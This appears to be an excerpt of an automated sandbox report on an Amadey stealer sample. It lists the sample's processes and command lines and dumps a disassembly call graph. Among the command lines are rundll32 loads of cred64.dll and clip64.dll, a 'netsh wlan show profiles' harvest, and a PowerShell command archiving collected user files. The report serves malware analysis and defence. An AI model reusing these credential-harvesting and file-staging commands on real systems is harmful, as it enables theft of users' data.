                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                    Imagebase:0x3b0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:71'680 bytes
                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6050d0000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                    Imagebase:0x3b0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:7%
                                                                                                      Total number of Nodes:429
                                                                                                      Total number of Limit Nodes:10
                                                                                                      execution_graph 10488 e14020 10489 e1406a 10488->10489 10491 e140b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 10489->10491 10492 e13de0 10489->10492 10493 e13e48 10492->10493 10494 e13e1e 10492->10494 10495 e13e58 10493->10495 10498 e12b00 10493->10498 10494->10491 10495->10491 10499 e12b0e 10498->10499 10505 e2ced7 10499->10505 10501 e12b42 10502 e12b49 10501->10502 10511 e12b80 10501->10511 10502->10491 10504 e12b58 std::_Throw_future_error 10506 e2cee4 10505->10506 10510 e2cf03 Concurrency::details::_Reschedule_chore 10505->10510 10514 e2e207 10506->10514 10508 e2cef4 10508->10510 10516 e2ceae 10508->10516 10510->10501 10522 e2ce8b 10511->10522 10513 e12bb2 shared_ptr 10513->10504 10515 e2e222 CreateThreadpoolWork 10514->10515 10515->10508 10518 e2ceb7 Concurrency::details::_Reschedule_chore 10516->10518 10520 e2e45c 10518->10520 10519 e2ced1 10519->10510 10521 e2e471 TpPostWork 10520->10521 10521->10519 10523 e2ce97 10522->10523 10524 e2cea7 10522->10524 10523->10524 10526 e2e108 10523->10526 10524->10513 10527 e2e11d TpReleaseWork 10526->10527 10527->10524 10646 e13ee0 10647 e13f22 10646->10647 10648 e13fd2 10647->10648 10649 e13f8c 10647->10649 10652 e13f35 std::invalid_argument::invalid_argument 10647->10652 10650 e13de0 3 API calls 10648->10650 10653 e134e0 10649->10653 10650->10652 10654 e13516 10653->10654 10658 e1354e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10654->10658 10659 e12be0 10654->10659 10656 e1359e 10657 e12b00 3 API calls 10656->10657 10656->10658 10657->10658 10658->10652 10660 e12c1d 10659->10660 10661 e2d56f InitOnceExecuteOnce 10660->10661 10662 e12c46 10661->10662 10664 e12c51 std::invalid_argument::invalid_argument 10662->10664 10665 e2d587 10662->10665 10664->10656 10666 e2d593 std::_Throw_future_error 10665->10666 10667 e2d603 10666->10667 10668 e2d5fa 10666->10668 10670 e129e0 InitOnceExecuteOnce 10667->10670 10672 e2d50f 10668->10672 10671 e2d5ff 10670->10671 10671->10664 10673 e2e2c1 InitOnceExecuteOnce 10672->10673 10674 e2d527 10673->10674 10674->10671 10803 e11fa0 10804 e2dd1b __Mtx_init_in_situ 2 API calls 10803->10804 10805 e11fac 10804->10805 10692 e29e60 10693 e29eba ___std_exception_copy 10692->10693 10699 e2b240 10693->10699 10696 e29efc std::invalid_argument::invalid_argument 10698 e29f69 std::_Throw_future_error 10709 e2b580 10699->10709 10701 e2b275 10702 e12be0 InitOnceExecuteOnce 10701->10702 10703 e2b2a6 10702->10703 10713 e2b600 10703->10713 10705 e29ee4 10705->10696 10706 e142f0 10705->10706 10707 e2d56f InitOnceExecuteOnce 10706->10707 10708 e1430a 10707->10708 10708->10698 10710 e2b59c 10709->10710 10711 e2dd1b __Mtx_init_in_situ 2 API calls 10710->10711 10712 e2b5a7 10711->10712 10712->10701 10716 e2b67f shared_ptr 10713->10716 10715 e2b6e8 10716->10715 10718 e2b8a0 10716->10718 10717 e2b6cb 10717->10705 10719 e2b920 10718->10719 10725 e28800 10719->10725 10721 e2b95c shared_ptr 10722 e2bb4e shared_ptr 10721->10722 10723 e13de0 3 API calls 10721->10723 10722->10717 10724 e2bb36 10723->10724 10724->10717 10726 e28841 10725->10726 10733 e13870 10726->10733 10728 e28a76 std::invalid_argument::invalid_argument 10728->10721 10729 e288dd ___std_exception_copy 10729->10728 10730 e2dd1b __Mtx_init_in_situ 2 API calls 10729->10730 10731 e28a31 10730->10731 10738 e12dc0 10731->10738 10734 e2dd1b __Mtx_init_in_situ 2 API calls 10733->10734 10735 e138a7 10734->10735 10736 e2dd1b __Mtx_init_in_situ 2 API calls 10735->10736 10737 e138e6 10736->10737 10737->10729 10739 e12e06 10738->10739 10740 e12e7e GetCurrentThreadId 10738->10740 10742 e2dd3c GetSystemTimePreciseAsFileTime 10739->10742 10741 e12e94 10740->10741 10758 e12eef 10740->10758 10747 e2dd3c GetSystemTimePreciseAsFileTime 10741->10747 10741->10758 10743 e12e12 10742->10743 10744 e12f1e 10743->10744 10750 e12e1d __Mtx_unlock 10743->10750 10745 e2d8fa 4 API calls 10744->10745 10746 e12f24 10745->10746 10748 e2d8fa 4 API calls 10746->10748 10749 e12eb9 10747->10749 10748->10749 10752 e2d8fa 4 API calls 10749->10752 10753 e12ec0 __Mtx_unlock 10749->10753 10750->10746 10751 e12e6f 10750->10751 10751->10740 10751->10758 10752->10753 10754 e2d8fa 4 API calls 10753->10754 10755 e12ed8 __Cnd_broadcast 10753->10755 10754->10755 10756 e2d8fa 4 API calls 10755->10756 10755->10758 10757 e12f3c 10756->10757 10759 e2dd3c GetSystemTimePreciseAsFileTime 10757->10759 10758->10728 10767 e12f80 shared_ptr __Mtx_unlock 10759->10767 10760 e130c5 10761 e2d8fa 4 API calls 10760->10761 10762 e130cb 10761->10762 10763 e2d8fa 4 API calls 10762->10763 10764 e130d1 10763->10764 10765 e2d8fa 4 API calls 10764->10765 10773 e13093 __Mtx_unlock 10765->10773 10766 e130a7 std::invalid_argument::invalid_argument 10766->10728 10767->10760 10767->10762 10767->10766 10770 e13032 GetCurrentThreadId 10767->10770 10768 e2d8fa 4 API calls 10769 e130dd 10768->10769 10770->10766 10771 e1303b 10770->10771 10771->10766 10772 e2dd3c GetSystemTimePreciseAsFileTime 10771->10772 10774 e1305f 10772->10774 10773->10766 10773->10768 10774->10760 10774->10764 10774->10773 10775 e2d3dc GetSystemTimePreciseAsFileTime 10774->10775 10775->10774 10806 e2e7a6 10807 e2e7b7 10806->10807 10808 e2e7bf 10807->10808 10810 e2e82e 10807->10810 10811 e2e83c SleepConditionVariableCS 10810->10811 10813 e2e855 10810->10813 10811->10813 10813->10807 10443 e1a4a4 10452 e18d00 10443->10452 10445 e1a4b3 shared_ptr 10446 e15d40 3 API calls 10445->10446 10451 e1a563 shared_ptr std::invalid_argument::invalid_argument 10445->10451 10447 e1a515 10446->10447 10448 e15d40 3 API calls 10447->10448 10449 e1a53d 10448->10449 10450 e15d40 3 API calls 10449->10450 10450->10451 10455 e18d54 shared_ptr 10452->10455 10453 e15d40 3 API calls 10453->10455 10454 e19013 shared_ptr std::invalid_argument::invalid_argument 10454->10445 10455->10453 10460 e18f1f shared_ptr 10455->10460 10456 e15d40 3 API calls 10456->10460 10457 e19385 shared_ptr std::invalid_argument::invalid_argument 10457->10445 10458 e1926f shared_ptr 10458->10457 10459 e15d40 3 API calls 10458->10459 10461 e193f7 shared_ptr ___std_exception_copy std::invalid_argument::invalid_argument 10459->10461 10460->10454 10460->10456 10460->10458 10461->10445 10303 e1a326 10304 e1a340 10303->10304 10305 e1a362 shared_ptr 10303->10305 10304->10305 10306 e1a41e 10304->10306 10309 e1a370 10305->10309 10319 e178b0 10305->10319 10310 e1a423 Sleep CreateMutexA 10306->10310 10308 e1a37e 10308->10309 10311 e178b0 4 API calls 10308->10311 10312 e1a45e 10310->10312 10313 e1a388 10311->10313 10313->10309 10314 e178b0 4 API calls 10313->10314 10315 e1a392 10314->10315 10315->10309 10316 e178b0 4 API calls 10315->10316 10317 e1a39c 10316->10317 10317->10309 10318 e178b0 4 API calls 10317->10318 10318->10309 10320 e17916 ___std_exception_copy 10319->10320 10353 e17a68 shared_ptr std::invalid_argument::invalid_argument 10320->10353 10354 e15d40 10320->10354 10322 e17952 10323 e15d40 3 API calls 10322->10323 10324 e1797f shared_ptr 10323->10324 10325 e17a53 GetNativeSystemInfo 10324->10325 10326 e17a57 10324->10326 10337 e17b06 ___std_exception_copy 10324->10337 10325->10326 10327 e17b94 10326->10327 10328 e17abf 10326->10328 10326->10353 10329 e15d40 3 API calls 10327->10329 10330 e15d40 3 API calls 10328->10330 10331 e17bc7 10329->10331 10332 e17ae7 10330->10332 10335 e15d40 3 API calls 10331->10335 10334 e15d40 3 API calls 10332->10334 10333 e15d40 3 API calls 10336 e17ef7 10333->10336 10334->10337 10339 e17be6 10335->10339 10338 e15d40 3 API calls 10336->10338 10337->10333 10337->10353 10338->10353 10340 e15d40 3 API calls 10339->10340 10341 e17c19 10340->10341 10342 e15d40 3 API calls 10341->10342 10343 e17c6a 10342->10343 10344 e15d40 3 API calls 10343->10344 10345 e17c89 10344->10345 10346 e15d40 3 API calls 10345->10346 10347 e17cbc 10346->10347 10348 e15d40 3 API calls 10347->10348 10349 e17d0d 10348->10349 10350 e15d40 3 API calls 10349->10350 10351 e17d2c 10350->10351 10352 e15d40 3 API calls 10351->10352 10352->10353 10353->10308 10356 e15d84 shared_ptr ___std_exception_copy 10354->10356 10355 e15e5c shared_ptr std::invalid_argument::invalid_argument 10355->10322 10356->10355 10357 e15ee4 RegOpenKeyExA 10356->10357 10358 e15f41 RegCloseKey 10357->10358 10359 e15f17 RegQueryValueExA 10357->10359 10360 e15f67 shared_ptr std::invalid_argument::invalid_argument 10358->10360 10359->10358 10360->10322 10462 e12070 10465 e2dd8c 10462->10465 10464 e1207a 10466 e2ddb4 10465->10466 10467 e2dd9c 10465->10467 10466->10464 10467->10466 10469 e2e64e 10467->10469 10472 e2e365 10469->10472 10473 e2e373 InitializeCriticalSectionEx 10472->10473 10474 e2e388 10472->10474 10473->10474 10474->10467 10554 e141b0 10557 e139c0 10554->10557 10556 e141bb shared_ptr 10558 e139f9 10557->10558 10559 e13a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10558->10559 10562 e13b38 10558->10562 10564 e131d0 10558->10564 10559->10556 10561 e131d0 5 API calls 10563 e13b5f 10561->10563 10562->10561 10562->10563 10563->10556 10565 e2dd3c GetSystemTimePreciseAsFileTime 10564->10565 10571 e13214 10565->10571 10566 e1326b 10567 e2d8fa 4 API calls 10566->10567 10568 e1323c __Mtx_unlock 10567->10568 10570 e2d8fa 4 API calls 10568->10570 10572 e13250 std::invalid_argument::invalid_argument 10568->10572 10573 e13277 10570->10573 10571->10566 10571->10568 10583 e2d3dc 10571->10583 10572->10562 10574 e2dd3c GetSystemTimePreciseAsFileTime 10573->10574 10575 e132af 10574->10575 10576 e2d8fa 4 API calls 10575->10576 10577 e132b6 __Cnd_broadcast 10575->10577 10576->10577 10578 e2d8fa 4 API calls 10577->10578 10579 e132d7 __Mtx_unlock 10577->10579 10578->10579 10580 e2d8fa 4 API calls 10579->10580 10581 e132eb 10579->10581 10582 e1330e 10580->10582 10581->10562 10582->10562 10586 e2d202 10583->10586 10585 e2d3ec 10585->10571 10587 e2d22c 10586->10587 10588 e2e5fb _xtime_get GetSystemTimePreciseAsFileTime 10587->10588 10589 e2d234 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10587->10589 10590 e2d25f __Xtime_diff_to_millis2 10588->10590 10589->10585 10590->10589 10591 e2e5fb _xtime_get GetSystemTimePreciseAsFileTime 10590->10591 10591->10589 10831 e17330 10832 e17371 shared_ptr 10831->10832 10833 e15d40 3 API calls 10832->10833 10835 e17403 shared_ptr 10832->10835 10833->10835 10834 e15d40 3 API calls 10837 e17563 10834->10837 10835->10834 10836 e174d3 shared_ptr std::invalid_argument::invalid_argument 10835->10836 10838 e15d40 3 API calls 10837->10838 10839 e17595 shared_ptr 10838->10839 10840 e15d40 3 API calls 10839->10840 10845 e17625 shared_ptr std::invalid_argument::invalid_argument 10839->10845 10841 e176fd 10840->10841 10842 e15d40 3 API calls 10841->10842 10843 e17720 10842->10843 10844 e15d40 3 API calls 10843->10844 10844->10845 10528 e12034 10531 e2dd1b 10528->10531 10530 e12040 10534 e2da65 10531->10534 10533 e2dd2b 10533->10530 10535 e2da7b 10534->10535 10536 e2da71 10534->10536 10535->10533 10537 e2da4e 10536->10537 10538 e2da2e 10536->10538 10543 e2e39a 10537->10543 10538->10535 10540 e2e365 __Mtx_init_in_situ InitializeCriticalSectionEx 10538->10540 10542 e2da47 10540->10542 10541 e2da60 10541->10533 10542->10533 10544 e2e3af RtlInitializeConditionVariable 10543->10544 10544->10541 10596 e14176 10599 e12310 10596->10599 10598 e1417f 10600 e12324 10599->10600 10603 e2cbbd 10600->10603 10611 e4517a 10603->10611 10605 e2cc35 ___std_exception_copy 10618 e2c83d 10605->10618 10607 e2cc28 10614 e2c5e6 10607->10614 10610 e1232a 10610->10598 10622 e465b9 10611->10622 10613 e2cbe5 10613->10605 10613->10607 10613->10610 10615 e2c62f ___std_exception_copy 10614->10615 10617 e2c642 shared_ptr 10615->10617 10626 e2ca2f 10615->10626 10617->10610 10619 e2c868 10618->10619 10621 e2c871 shared_ptr 10618->10621 10620 e2ca2f InitOnceExecuteOnce 10619->10620 10620->10621 10621->10610 10623 e465be ___std_exception_copy 10622->10623 10623->10613 10624 e47c7d 3 API calls 10623->10624 10625 e4a252 10624->10625 10627 e2d56f InitOnceExecuteOnce 10626->10627 10629 e2ca71 10627->10629 10628 e2ca78 10628->10617 10629->10628 10630 e2d56f InitOnceExecuteOnce 10629->10630 10631 e2caf1 10630->10631 10631->10617 10375 e47cb9 10378 e47b57 10375->10378 10380 e47b65 10378->10380 10379 e47bb0 10380->10379 10383 e47bbb 10380->10383 10382 e47bba 10389 e4b922 GetPEB 10383->10389 10385 e47bc5 10386 e47bda 10385->10386 10387 e47bca GetPEB 10385->10387 10388 e47bf2 ExitProcess 10386->10388 10387->10386 10390 e4b93c 10389->10390 10390->10385 10642 e12d00 10643 e12d28 10642->10643 10644 e2dd1b __Mtx_init_in_situ 2 API calls 10643->10644 10645 e12d33 10644->10645 10680 e18280 10681 e18286 10680->10681 10682 e18288 GetFileAttributesA 10680->10682 10681->10682 10683 e18294 10682->10683 10781 e18600 10782 e1864c 10781->10782 10783 e15d40 3 API calls 10782->10783 10784 e18667 shared_ptr std::invalid_argument::invalid_argument 10783->10784 10299 e18282 10300 e18286 10299->10300 10301 e18288 GetFileAttributesA 10299->10301 10300->10301 10302 e18294 10301->10302 10632 e19547 10633 e19550 shared_ptr 10632->10633 10634 e1a423 Sleep CreateMutexA 10633->10634 10635 e1961b shared_ptr 10633->10635 10636 e1a45e 10634->10636 10818 e13b47 10819 e13b51 10818->10819 10820 e131d0 5 API calls 10819->10820 10821 e13b5f 10819->10821 10820->10821 10361 e15dc8 10363 e15dd6 shared_ptr ___std_exception_copy 10361->10363 10362 e15e5c shared_ptr std::invalid_argument::invalid_argument 10363->10362 10364 e15ee4 RegOpenKeyExA 10363->10364 10365 e15f41 RegCloseKey 10364->10365 10366 e15f17 RegQueryValueExA 10364->10366 10368 e15f67 shared_ptr 10365->10368 10366->10365 10367 e15fe7 shared_ptr std::invalid_argument::invalid_argument 10368->10367 10369 e15d40 3 API calls 10368->10369 10370 e16231 shared_ptr 10369->10370 10371 e15d40 3 API calls 10370->10371 10374 e163d2 shared_ptr std::invalid_argument::invalid_argument 10370->10374 10373 e162bd shared_ptr 10371->10373 10372 e15d40 3 API calls 10372->10373 10373->10372 10373->10374 10814 e13b8e 10815 e13b98 10814->10815 10816 e12310 4 API calls 10815->10816 10817 e13ba5 10815->10817 10816->10817 10295 e1a9d0 10296 e1aa22 10295->10296 10297 e1abdd CoInitialize 10296->10297 10298 e1ac2a shared_ptr std::invalid_argument::invalid_argument 10297->10298 10391 e1d8d0 recv 10392 e1d932 recv 10391->10392 10393 e1d967 recv 10392->10393 10395 e1d9a1 10393->10395 10394 e1dac3 std::invalid_argument::invalid_argument 10395->10394 10400 e2dd3c 10395->10400 10410 e2dae2 10400->10410 10402 e1dafe 10403 e2d8fa 10402->10403 10404 e2d922 ___std_exception_copy 10403->10404 10405 e2d904 10403->10405 10430 e47c7d 10404->10430 10405->10404 10406 e2d913 10405->10406 10427 e2d927 10406->10427 10411 e2db38 10410->10411 10413 e2db0a std::invalid_argument::invalid_argument 10410->10413 10411->10413 10416 e2e5fb 10411->10416 10413->10402 10414 e2db8d __Xtime_diff_to_millis2 10414->10413 10415 e2e5fb _xtime_get GetSystemTimePreciseAsFileTime 10414->10415 10415->10414 10417 e2e60a 10416->10417 10419 e2e617 __aulldvrm 10416->10419 10417->10419 10420 e2e5d4 10417->10420 10419->10414 10423 e2e27a 10420->10423 10424 e2e297 10423->10424 10425 e2e28b GetSystemTimePreciseAsFileTime 10423->10425 10424->10419 10425->10424 10433 e129e0 10427->10433 10429 e2d93e std::_Throw_future_error 10431 e47b57 3 API calls 10430->10431 10432 e47c8e 10431->10432 10436 e2d56f 10433->10436 10435 e129f4 __dosmaperr __freea 10435->10429 10439 e2e2c1 10436->10439 10440 e2e2cf InitOnceExecuteOnce 10439->10440 10442 e2d582 10439->10442 10440->10442 10442->10435 10481 e18450 10483 e185ba 10481->10483 10484 e184a8 shared_ptr 10481->10484 10482 e15d40 3 API calls 10482->10484 10484->10482 10484->10483 10684 e12a90 10685 e12ace 10684->10685 10686 e2ce8b TpReleaseWork 10685->10686 10687 e12adb shared_ptr std::invalid_argument::invalid_argument 10686->10687 10785 e12a10 10786 e12a1a 10785->10786 10787 e12a1c 10785->10787 10788 e2d8fa 4 API calls 10787->10788 10789 e12a22 10788->10789 10485 e1205a 10486 e2dd8c InitializeCriticalSectionEx 10485->10486 10487 e12064 10486->10487 10688 e13e9f 10689 e13eb6 10688->10689 10690 e13ead 10688->10690 10691 e12310 4 API calls 10690->10691 10691->10689 10827 e2e75c 10828 e2e76c 10827->10828 10829 e2e814 10828->10829 10830 e2e810 RtlWakeAllConditionVariable 10828->10830

                                                                                                      Executed Functions

                                                                                                      Function 00E15DC8 Relevance: 20.6, APIs: 3, Strings: 8, Instructions: 1325registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 e15dc8-e15dd4 1 e15dd6-e15de4 0->1 2 e15dea-e15e0c call e2ecf8 0->2 1->2 3 e15e82 call e482fa 1->3 9 e15e36-e15e3c 2->9 10 e15e0e-e15e1a 2->10 8 e15e87-e15f15 call e482fa call e45780 RegOpenKeyExA 3->8 28 e15f41-e15f64 RegCloseKey 8->28 29 e15f17-e15f40 RegQueryValueExA 8->29 13 e15e66-e15e81 call e2e681 9->13 14 e15e3e-e15e4a 9->14 15 e15e2c-e15e33 call e2ecf8 10->15 16 e15e1c-e15e2a 10->16 19 e15e5c-e15e63 call e2ecf8 14->19 20 e15e4c-e15e5a 14->20 15->9 16->3 16->15 19->13 20->8 20->19 30 e15f67-e15f6c 28->30 29->28 30->30 31 e15f6e-e15f85 call e29750 30->31 34 e15f87-e15f93 31->34 35 e15faf-e15fc7 31->35 38 e15fa5-e15fac call e2ecf8 34->38 39 e15f95-e15fa3 34->39 36 e15ff1-e1600c call e2e681 35->36 37 e15fc9-e15fd5 35->37 40 e15fe7-e15fee call e2ecf8 37->40 41 e15fd7-e15fe5 37->41 38->35 39->38 43 e1600d-e1605b call e482fa 39->43 40->36 41->40 41->43 52 e16087-e16096 43->52 53 e1605d-e16086 43->53 56 e160c4-e160dc 52->56 57 e16098-e160a4 52->57 53->52 60 e16106-e1611e 56->60 61 e160de-e160ea 56->61 58 e160a6-e160b4 57->58 59 e160ba-e160c1 call e2ecf8 57->59 58->59 62 e16156-e16238 call e482fa call e29090 call e15d40 58->62 59->56 66 e16120-e1612c 60->66 67 e16148-e16155 call e2e681 60->67 64 e160fc-e16103 call e2ecf8 61->64 65 e160ec-e160fa 61->65 86 e1623a 62->86 87 e1623c-e1625b call e121c0 62->87 64->60 65->62 65->64 68 e1613e-e16145 call e2ecf8 66->68 69 e1612e-e1613c 66->69 68->67 69->62 69->68 86->87 90 e1625d-e1626c 87->90 91 e1628c-e16292 87->91 92 e16282-e16289 call e2ecf8 90->92 93 e1626e-e1627c 90->93 94 e16295-e1629a 91->94 92->91 93->92 95 e164b7 call e482fa 93->95 94->94 97 e1629c-e162c4 call e29090 call e15d40 94->97 102 e164bc call e482fa 95->102 107 e162c6 97->107 108 e162c8-e162e9 call e121c0 97->108 106 e164c1-e16542 call e482fa 102->106 113 e16548 106->113 114 e1682a-e1683e 106->114 107->108 117 e162eb-e162fa 108->117 118 e1631a-e1632e 108->118 119 e16550-e16564 113->119 115 e168e3 call e29890 114->115 116 e16844-e16869 call e29750 114->116 126 e168e8-e16a19 call e482fa call e2a170 call e29750 115->126 132 e16893-e16899 116->132 133 e1686b-e16877 116->133 122 e16310-e16317 call e2ecf8 117->122 123 e162fc-e1630a 117->123 130 e16334-e1633a 118->130 131 e163d8-e163fc 118->131 119->115 124 e1656a-e165b4 call e29750 call e2ab00 119->124 122->118 123->102 123->122 152 e166e9-e16703 124->152 153 e165ba-e165d7 call e2ab00 124->153 217 e16a4b-e16a5d 126->217 218 e16a1b-e16a21 126->218 137 e16340-e1636d call e29090 call e15d40 130->137 138 e16400-e16405 131->138 142 e168c3-e168e2 call e2e681 132->142 143 e1689b-e168a7 132->143 139 e16889-e16890 call e2ecf8 133->139 140 e16879-e16887 133->140 186 e16371-e16398 call e121c0 137->186 187 e1636f 137->187 138->138 146 e16407-e1646c call e29750 * 2 138->146 139->132 140->126 140->139 149 e168b9-e168c0 call e2ecf8 143->149 150 e168a9-e168b7 143->150 179 e16499-e164b6 call e2e681 146->179 180 e1646e-e1647d 146->180 149->142 150->126 150->149 152->115 164 e16709-e16765 call e29750 call e2a910 152->164 153->152 171 e165dd-e165fa call e2ab00 153->171 191 e16767-e16773 164->191 192 e1679c-e167af 164->192 171->152 194 e16600-e1661d call e2ab00 171->194 188 e1648f-e16496 call e2ecf8 180->188 189 e1647f-e1648d 180->189 210 e163c9-e163cc 186->210 211 e1639a-e163a9 186->211 187->186 188->179 189->106 189->188 197 e16775-e16783 191->197 198 e16789-e16797 call e2ecf8 191->198 200 e167b1-e167bd 192->200 201 e167dd-e167e4 192->201 194->152 219 e16623-e16640 call e2ab00 194->219 197->126 197->198 198->192 207 e167d3-e167da call e2ecf8 200->207 208 e167bf-e167cd 200->208 212 e167e6-e167ef 201->212 213 e1680f-e1681b 201->213 207->201 208->126 208->207 210->137 214 e163d2 210->214 221 e163ab-e163b9 211->221 222 e163bf-e163c6 call e2ecf8 211->222 223 e167f1-e167ff 212->223 224 e16805-e1680c call e2ecf8 212->224 213->119 215 e16821-e16827 213->215 214->131 215->114 218->217 226 e16a23-e16a2f 218->226 219->152 237 e16646-e16663 call e2ab00 219->237 221->95 221->222 222->210 223->126 223->224 224->213 232 e16a41-e16a48 call e2ecf8 226->232 233 e16a31-e16a3f 226->233 232->217 233->232 235 e16a5e-e16a63 call e482fa 233->235 237->152 243 e16669-e16686 call e2ab00 237->243 243->152 246 e16688-e166a5 call e2ab00 243->246 246->152 249 e166a7-e166c4 call e2ab00 246->249 249->152 252 e166c6-e166e3 call e2ab00 249->252 252->152 252->201
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00E15F0D
                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00E15F3B
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00E15F47
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
